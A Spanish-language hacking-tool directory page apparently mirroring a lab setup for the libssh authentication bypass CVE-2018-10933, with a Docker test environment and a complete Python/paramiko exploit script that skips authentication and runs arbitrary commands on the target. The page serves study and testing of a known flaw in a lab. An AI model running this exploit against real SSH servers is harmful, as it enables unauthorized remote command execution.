Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Libssh-server-CVE-2018-10933 | Kitploit
Herramientas/GitHubGitHub/cyberharsh/libssh-server-cve-2018-10933
Análisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónAutenticaciónExplotación de Binarios
GitHubcyberharsh/libssh-server-cve-2018-10933

Libssh-server-CVE-2018-10933

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 6 añosAún no revisado

Vulnerabilidad de omisión de autenticación en libssh (CVE-2018-10933)

中文版本(Chinese version)

libssh es una librería C multiplataforma que implementa el protocolo SSHv2 tanto en el lado del cliente como del servidor. Se encontró una vulnerabilidad lógica en la máquina de estados del lado del servidor de libssh. El atacante puede enviar el mensaje MSG_USERAUTH_SUCCESS antes de que la autenticación tenga éxito. Esto puede omitir la autenticación y acceder al servidor SSH objetivo.

Referencias:

  • https://www.libssh.org/security/advisories/CVE-2018-10933.txt
  • https://www.seebug.org/vuldb/ssvid-97614

Configuración

Inicie el entorno:

root@kitploit:~
docker-compose up -d

Una vez que el entorno esté iniciado, podemos conectarnos al puerto your-ip:2222 (cuenta/contraseña: myuser:mypassword), que es un inicio de sesión SSH legítimo:

Explotación

Haciendo referencia al PoC proporcionado en https://www.seebug.org/vuldb/ssvid-97614, podemos usar el siguiente script para probar la vulnerabilidad.

root@kitploit:~
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

Puede ejecutar comandos arbitrarios en el servidor objetivo de la siguiente manera:

Descargar herramienta